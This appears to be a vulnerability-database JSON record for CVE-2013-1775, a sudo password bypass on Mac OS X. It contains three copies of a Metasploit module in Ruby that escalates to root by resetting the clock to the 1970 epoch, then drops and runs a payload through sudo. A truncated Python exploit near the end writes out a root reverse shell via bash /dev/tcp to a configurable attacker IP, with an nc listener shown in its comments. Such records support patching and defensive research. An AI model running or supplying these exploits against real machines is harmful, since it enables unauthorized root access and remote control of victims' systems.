http://metasploit.com/\r\n##\r\nrequire 'shellwords'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n\r\n # ManualRanking because it's going to modify system time\r\n # Even when it will try to restore things, user should use\r\n # it at his own risk\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\r\n SUDOER_GROUP = \"admin\"\r\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\r\n\r\n # saved clock config\r\n attr_accessor :time, :date, :networked, :zone, :network_server\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X Sudo Password Bypass',\r\n 'Description' => %q{\r\n This module gains a session with root permissions on versions of OS X with\r\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\r\n and possibly lower versions.\r\n\r\n If your session belongs to a user with Administrative Privileges\r\n (the user is in the sudoers file and is in the \"admin group\"), and the\r\n user has ever run the \"sudo\" command, it is possible to become the super\r\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\r\n\r\n This module will fail silently if the user is not an admin or if the user has never\r\n run the sudo command.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Todd C. Miller', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # Metasploit module\r\n 'juan vazquez' # testing/fixing module bugs\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1775' ],\r\n [ 'OSVDB', '90677' ],\r\n [ 'BID', '58203' ],\r\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Mac OS X x64 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64\r\n }\r\n ],\r\n [ 'CMD',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 28 2013'\r\n ))\r\n register_advanced_options([\r\n OptString.new('TMP_FILE',\r\n [true,'For the native targets, specifies the path that '+\r\n 'the executable will be dropped on the client machine.',\r\n '/tmp/.<random>/<random>']\r\n ),\r\n ], self.class)\r\n end\r\n\r\n # ensure target is vulnerable by checking sudo vn and checking\r\n # user is in admin group.\r\n def check\r\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\r\n sudo_vn = $1\r\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\r\n # check vn between 1.6.0 through 1.7.10p6\r\n # and 1.8.0 through 1.8.6p6\r\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\r\n print_error \"sudo version #{sudo_vn} not vulnerable.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_error \"sudo not detected on the system.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if not user_in_admin_group?\r\n print_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\r\n Exploit::CheckCode::Safe\r\n end\r\n # one root for you sir\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if not user_in_admin_group?\r\n fail_with(Exploit::Failure::NotFound, \"User is not in the 'admin' group, bailing.\")\r\n end\r\n # \"remember\" the current system time/date/network/zone\r\n print_good(\"User is an admin, continuing...\")\r\n\r\n # drop the payload (unless CMD)\r\n if using_native_target?\r\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\r\n write_file(drop_path, generate_payload_exe)\r\n register_files_for_cleanup(drop_path)\r\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\r\n print_status(\"Payload dropped and registered for cleanup\")\r\n end\r\n\r\n print_status(\"Saving system clock config...\")\r\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\r\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\r\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\r\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\r\n @network_server = if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\r\n end\r\n\r\n run_sudo_cmd\r\n end\r\n\r\n def cleanup\r\n print_status(\"Resetting system clock to original values\") if @time\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil?\r\n\r\n if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\r\n unless @network_server.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\r\n end\r\n end\r\n\r\n print_good(\"Completed clock reset.\") if @time\r\n end\r\n\r\n private\r\n\r\n def run_sudo_cmd\r\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\r\n cmd_exec(\r\n \"sudo -k; \\n\"+\r\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\r\n \" -setdate 01:01:1970 -settime 00:00\"\r\n )\r\n\r\n # Run Test\r\n test = rand_text_alpha(4 + rand(4))\r\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\r\n\r\n print_status(\"Testing that user has sudoed before...\")\r\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\r\n\r\n if output =~ /incorrect password attempts\\s*$/i\r\n fail_with(Exploit::Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\r\n elsif output =~ /#{test}/\r\n print_good(\"Test executed succesfully. Running payload.\")\r\n else\r\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\r\n end\r\n\r\n # Run Payload\r\n sudo_cmd_raw = if using_native_target?\r\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\r\n elsif using_cmd_target?\r\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\r\n end\r\n\r\n ## to prevent the password prompt from destroying session\r\n ## backgrounding the sudo payload in order to keep both sessions usable\r\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\r\n\r\n print_status \"Running command: \"\r\n print_line sudo_cmd\r\n output = cmd_exec(sudo_cmd)\r\n\r\n end\r\n\r\n # helper methods for accessing datastore\r\n def using_native_target?; target.name =~ /native/i; end\r\n def using_cmd_target?; target.name =~ /cmd/i; end\r\n def drop_path\r\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\r\n end\r\n\r\n # checks that the user is in OSX's admin group, necessary to change sys clock\r\n def user_in_admin_group?\r\n cmd_exec(\"groups `whoami`\").split(/\\s+/).include?(SUDOER_GROUP)\r\n end\r\n\r\n # helper methods for dealing with sudo's vn num\r\n def parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end\r\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\r\n vn_parts = parse_vn(vn)\r\n ranges.any? do |range|\r\n min_parts = parse_vn(range[0])\r\n max_parts = parse_vn(range[1])\r\n vn_parts.all? do |part|\r\n min = min_parts.shift\r\n max = max_parts.shift\r\n (min.nil? or (not part.nil? and part >= min)) and\r\n (part.nil? or (not max.nil? and part <= max))\r\n end\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27944/"}], "metasploit": [{"lastseen": "2020-10-12T23:01:51", "description": "This module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the \"admin group\"), and the user has ever run the \"sudo\" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This module will fail silently if the user is not an admin, if the user has never run the sudo command, or if the admin has locked the Date/Time preferences. Note: If the user has locked the Date/Time preferences, requests to overwrite the system clock will be ignored, and the module will silently fail. However, if the \"Require an administrator password to access locked preferences\" setting is not enabled, the Date/Time preferences are often unlocked every time the admin logs in, so you can install persistence and wait for a chance later.\n", "published": "2013-08-26T18:20:43", "type": "metasploit", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\nrequire 'shellwords'\n\nclass MetasploitModule < Msf::Exploit::Local\n\n # ManualRanking because it's going to modify system time\n # Even when it will try to restore things, user should use\n # it at his own risk\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\n CMD_TIMEOUT = 45\n\n # saved clock config\n attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X Sudo Password Bypass',\n 'Description' => %q{\n This module gains a session with root permissions on versions of OS X with\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\n and possibly lower versions.\n\n If your session belongs to a user with Administrative Privileges\n (the user is in the sudoers file and is in the \"admin group\"), and the\n user has ever run the \"sudo\" command, it is possible to become the super\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\n\n This module will fail silently if the user is not an admin, if the user has never\n run the sudo command, or if the admin has locked the Date/Time preferences.\n\n Note: If the user has locked the Date/Time preferences, requests to overwrite\n the system clock will be ignored, and the module will silently fail. However,\n if the \"Require an administrator password to access locked preferences\" setting\n is not enabled, the Date/Time preferences are often unlocked every time the admin\n logs in, so you can install persistence and wait for a chance later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Todd C. Miller', # Vulnerability discovery\n 'joev', # Metasploit module\n 'juan vazquez' # testing/fixing module bugs\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1775' ],\n [ 'OSVDB', '90677' ],\n [ 'BID', '58203' ],\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\n ],\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Mac OS X x64 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ],\n [ 'CMD',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-02-28'\n ))\n register_advanced_options([\n OptString.new('TMP_FILE',\n [true,'For the native targets, specifies the path that '+\n 'the executable will be dropped on the client machine.',\n '/tmp/.<random>/<random>']\n ),\n ])\n end\n\n # ensure target is vulnerable by checking sudo vn and checking\n # user is in admin group.\n def check\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\n sudo_vn = $1\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\n # check vn between 1.6.0 through 1.7.10p6\n # and 1.8.0 through 1.8.6p6\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\n vprint_error \"sudo version #{sudo_vn} not vulnerable.\"\n return CheckCode::Safe\n end\n else\n vprint_error \"sudo not detected on the system.\"\n return CheckCode::Safe\n end\n\n # check that the user is in OSX's admin group, necessary to change sys clock\n unless is_admin?\n vprint_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\n return CheckCode::Safe\n end\n\n # one root for you sir\n CheckCode::Vulnerable\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless is_admin?\n fail_with Failure::NoAccess, \"User is not in the 'admin' group, bailing.\"\n end\n\n if check != CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n # \"remember\" the current system time/date/network/zone\n print_good(\"User is an admin, continuing...\")\n\n print_status(\"Saving system clock config...\")\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\n @network_server = if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\n end\n\n run_sudo_cmd\n end\n\n def cleanup\n if @clock_changed\n print_status(\"Resetting system clock to original values\") if @time\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil?\n if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\n unless @network_server.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\n end\n end\n print_good(\"Completed clock reset.\")\n else\n print_status \"Skipping cleanup since the clock was never changed\"\n end\n\n super\n end\n\n private\n\n def run_sudo_cmd\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\n cmd_exec(\n \"sudo -k; \\n\"+\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\n \" -setdate 01:01:1970 -settime 00:00\"\n )\n if not cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(\"1/1/1970\")\n fail_with(Failure::NoAccess, \"Date and time preference pane appears to be locked. By default, this pane is unlocked upon login.\")\n else\n @clock_changed = true\n end\n\n # drop the payload (unless CMD)\n if using_native_target?\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\n write_file(drop_path, generate_payload_exe)\n register_files_for_cleanup(drop_path)\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\n print_status(\"Payload dropped and registered for cleanup\")\n end\n\n # Run Test\n test = rand_text_alpha(4 + rand(4))\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\n\n print_status(\"Testing that user has sudoed before...\")\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\n\n if output =~ /incorrect password attempts\\s*$/i\n fail_with(Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\n elsif output =~ /#{test}/\n print_good(\"Test executed succesfully. Running payload.\")\n else\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\n end\n\n # Run Payload\n sudo_cmd_raw = if using_native_target?\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\n elsif using_cmd_target?\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\n end\n\n ## to prevent the password prompt from destroying session\n ## backgrounding the sudo payload in order to keep both sessions usable\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\n\n print_status \"Running command: \"\n print_line sudo_cmd\n output = cmd_exec(sudo_cmd)\n\n end\n\n # default cmd_exec timeout to CMD_TIMEOUT constant\n def cmd_exec(cmd, args=nil, timeout=CMD_TIMEOUT)\n super\n end\n\n # helper methods for accessing datastore\n def using_native_target?\n target.name =~ /native/i\n end\n\n def using_cmd_target?\n target.name =~ /cmd/i\n end\n\n def drop_path\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\n end\n\n # helper methods for dealing with sudo's vn num\n def parse_vn(vn_str)\n vn_str.split(/[\\.p]/).map(&:to_i)\n end\n\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\n vn_parts = parse_vn(vn)\n ranges.any? do |range|\n min_parts = parse_vn(range[0])\n max_parts = parse_vn(range[1])\n vn_parts.all? do |part|\n min = min_parts.shift\n max = max_parts.shift\n (min.nil? or (not part.nil? and part >= min)) and\n (part.nil? or (not max.nil? and part <= max))\n end\n end\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/sudo_password_bypass.rb"}, {"lastseen": "2021-01-06T05:20:59", "description": "This module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the \"admin group\"), and the user has ever run the \"sudo\" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This module will fail silently if the user is not an admin, if the user has never run the sudo command, or if the admin has locked the Date/Time preferences. Note: If the user has locked the Date/Time preferences, requests to overwrite the system clock will be ignored, and the module will silently fail. However, if the \"Require an administrator password to access locked preferences\" setting is not enabled, the Date/Time preferences are often unlocked every time the admin logs in, so you can install persistence and wait for a chance later.\n", "published": "2013-08-26T19:52:51", "type": "metasploit", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2020-12-07T10:31:45", "id": "MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'shellwords'\n\nclass MetasploitModule < Msf::Exploit::Local\n\n # ManualRanking because it's going to modify system time\n # Even when it will try to restore things, user should use\n # it at his own risk\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\n CMD_TIMEOUT = 45\n\n # saved clock config\n attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X Sudo Password Bypass',\n 'Description' => %q{\n This module gains a session with root permissions on versions of OS X with\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\n and possibly lower versions.\n\n If your session belongs to a user with Administrative Privileges\n (the user is in the sudoers file and is in the \"admin group\"), and the\n user has ever run the \"sudo\" command, it is possible to become the super\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\n\n This module will fail silently if the user is not an admin, if the user has never\n run the sudo command, or if the admin has locked the Date/Time preferences.\n\n Note: If the user has locked the Date/Time preferences, requests to overwrite\n the system clock will be ignored, and the module will silently fail. However,\n if the \"Require an administrator password to access locked preferences\" setting\n is not enabled, the Date/Time preferences are often unlocked every time the admin\n logs in, so you can install persistence and wait for a chance later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Todd C. Miller', # Vulnerability discovery\n 'joev', # Metasploit module\n 'juan vazquez' # testing/fixing module bugs\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1775' ],\n [ 'OSVDB', '90677' ],\n [ 'BID', '58203' ],\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\n ],\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Mac OS X x64 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ],\n [ 'CMD',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-02-28'\n ))\n register_advanced_options([\n OptString.new('TMP_FILE',\n [true,'For the native targets, specifies the path that '+\n 'the executable will be dropped on the client machine.',\n '/tmp/.<random>/<random>']\n ),\n ])\n end\n\n # ensure target is vulnerable by checking sudo vn and checking\n # user is in admin group.\n def check\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\n sudo_vn = $1\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\n # check vn between 1.6.0 through 1.7.10p6\n # and 1.8.0 through 1.8.6p6\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\n vprint_error \"sudo version #{sudo_vn} not vulnerable.\"\n return CheckCode::Safe\n end\n else\n vprint_error \"sudo not detected on the system.\"\n return CheckCode::Safe\n end\n\n # check that the user is in OSX's admin group, necessary to change sys clock\n unless is_admin?\n vprint_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\n return CheckCode::Safe\n end\n\n # one root for you sir\n CheckCode::Vulnerable\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless is_admin?\n fail_with Failure::NoAccess, \"User is not in the 'admin' group, bailing.\"\n end\n\n if check != CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n # \"remember\" the current system time/date/network/zone\n print_good(\"User is an admin, continuing...\")\n\n print_status(\"Saving system clock config...\")\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\n @network_server = if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\n end\n\n run_sudo_cmd\n end\n\n def cleanup\n if @clock_changed\n print_status(\"Resetting system clock to original values\") if @time\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil?\n if @networked\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\n unless @network_server.nil?\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\n end\n end\n print_good(\"Completed clock reset.\")\n else\n print_status \"Skipping cleanup since the clock was never changed\"\n end\n\n super\n end\n\n private\n\n def run_sudo_cmd\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\n cmd_exec(\n \"sudo -k; \\n\"+\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\n \" -setdate 01:01:1970 -settime 00:00\"\n )\n if not cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(\"1/1/1970\")\n fail_with(Failure::NoAccess, \"Date and time preference pane appears to be locked. By default, this pane is unlocked upon login.\")\n else\n @clock_changed = true\n end\n\n # drop the payload (unless CMD)\n if using_native_target?\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\n write_file(drop_path, generate_payload_exe)\n register_files_for_cleanup(drop_path)\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\n print_status(\"Payload dropped and registered for cleanup\")\n end\n\n # Run Test\n test = rand_text_alpha(4 + rand(4))\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\n\n print_status(\"Testing that user has sudoed before...\")\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\n\n if output =~ /incorrect password attempts\\s*$/i\n fail_with(Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\n elsif output =~ /#{test}/\n print_good(\"Test executed succesfully. Running payload.\")\n else\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\n end\n\n # Run Payload\n sudo_cmd_raw = if using_native_target?\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\n elsif using_cmd_target?\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\n end\n\n ## to prevent the password prompt from destroying session\n ## backgrounding the sudo payload in order to keep both sessions usable\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\n\n print_status \"Running command: \"\n print_line sudo_cmd\n output = cmd_exec(sudo_cmd)\n\n end\n\n # default cmd_exec timeout to CMD_TIMEOUT constant\n def cmd_exec(cmd, args=nil, timeout=CMD_TIMEOUT)\n super\n end\n\n # helper methods for accessing datastore\n def using_native_target?\n target.name =~ /native/i\n end\n\n def using_cmd_target?\n target.name =~ /cmd/i\n end\n\n def drop_path\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\n end\n\n # helper methods for dealing with sudo's vn num\n def parse_vn(vn_str)\n vn_str.split(/[\\.p]/).map(&:to_i)\n end\n\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\n vn_parts = parse_vn(vn)\n ranges.any? do |range|\n min_parts = parse_vn(range[0])\n max_parts = parse_vn(range[1])\n vn_parts.all? do |part|\n min = min_parts.shift\n max = max_parts.shift\n (min.nil? or (not part.nil? and part >= min)) and\n (part.nil? or (not max.nil? and part <= max))\n end\n end\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/sudo_password_bypass.rb"}], "ubuntu": [{"lastseen": "2020-07-02T11:36:35", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775"], "description": "Marco Schoepl discovered that Sudo incorrectly handled time stamp files \nwhen the system clock is set to epoch. A local attacker could use this \nissue to run Sudo commands without a password prompt.", "edition": 5, "modified": "2013-02-28T00:00:00", "published": "2013-02-28T00:00:00", "id": "USN-1754-1", "href": "https://ubuntu.com/security/notices/USN-1754-1", "title": "Sudo vulnerability", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:00", "description": "", "published": "2013-08-30T00:00:00", "type": "packetstorm", "title": "Mac OS X 10.8.4 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-30T00:00:00", "id": "PACKETSTORM:123032", "href": "https://packetstormsecurity.com/files/123032/Mac-OS-X-10.8.4-Local-Privilege-Escalation.html", "sourceData": "`#!/usr/bin/python \n \n# Original MSF Module: \n# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb \n \n################################################################################################### \n# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell \n# Date: 08-27-2013 \n# Exploit Author: David Kennedy @ TrustedSec \n# Website: https://www.trustedsec.com \n# Twitter: @Dave_ReL1K \n# Tested On: OSX 10.8.4 \n# \n# Reference: http://www.exploit-db.com/exploits/27944/ \n# \n# Example below: \n# trustedsec:Desktop Dave$ python osx_esc.py \n# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444 \n# \n# attacker_box:~ Dave$ nc -l 4444 \n# bash: no job control in this shell \n# bash-3.2# \n################################################################################################### \nimport subprocess \n \n# IPADDR for REVERSE SHELL - change this to your attacker IP address \nipaddr = \"192.168.1.1\" \n \n# PORT for REVERSE SHELL - change this to your attacker port address \nport = \"4444\" \n \n# drop into a root shell - replace 192.168.1.1 with the reverse listener \nproc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) \nproc.stdin.write(\"systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\\nbash -i >& /dev/tcp/%s/%s 0>&1 &\\n\" % (ipaddr,port)) \nprint \"\"\" \n############################################################### \n# \n# OSX < 10.8.4 Local 